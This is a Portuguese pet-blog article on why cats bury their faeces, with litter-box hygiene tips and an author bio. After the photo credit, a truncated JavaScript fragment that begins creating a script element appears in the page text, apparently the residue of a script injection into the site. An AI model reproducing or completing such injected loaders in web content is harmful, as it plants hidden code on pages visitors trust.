Porque é que os gatos enterram as fezes?

Nídia Teiga Gatos, Higiene 0 Comments

Fonte: Pascal Rey

Os gatos são considerados os animais com mais hábitos de higiene do mundo, entre eles, enterrar as próprias fezes. Eles fazem isto devido aos seus instintos de auto preservação, ou seja, escondem as fezes para não denunciarem a sua presença caso exista algum possível predador por perto. Além disso o odor pode ser bastante desagradável inclusive para o próprio animal.

Os gatos podem ainda deixar, por vezes, as fezes expostas, mas apenas o fazem quando pretendem marcar território. Este hábito é mais comum em felinos selvagens, sendo que o “chefe” do dominante, não esconde.

Prevenção

Caso o seu gato tenha o hábito de urinar ou defecar fora da caixa, leve-o ao veterinário pois o gato poderá estar com algum problema de saúde.

Higiene

É fundamental que os donos definam uma área para que o animal faça as suas necessidades e que tenham uma caixa com areia para que eles possam esconder as fezes.

Esta caixa deve ainda ficar longe das tijelas da água e da comida e da cama. Se tiver mais que um gato estude a possibilidade de ter duas caixas, pois muitas vezes os gatos não gostam de partilhar o seu local de higiene.

É ainda dever do dono assegurar-se que a caixa se mantem limpa e que a areia é trocada as vezes necessárias.

Fotografia: Pascal Rey Photographies _DSC8448-PFT+_v1 via photopin (license)var d=document;var s=d.createElement(‘script’);

Apaixonada por animais e o seu melhor amigo é o Dallas, um Boxer muito querido e louco para a brincadeira. Blogger e Community Manager da Love Pet Food. Licenciada em Economia na Nova School of Business and Economics e mestre em Marketing pelo ISCTE Business School.

Junte-se a milhares de pet lovers e receba a nossa newsletter patuda.

Todas as semanas enviamos a nossa newsletter cheia de dicas, notícias e videos divertidos. Não perca nada e subscreva!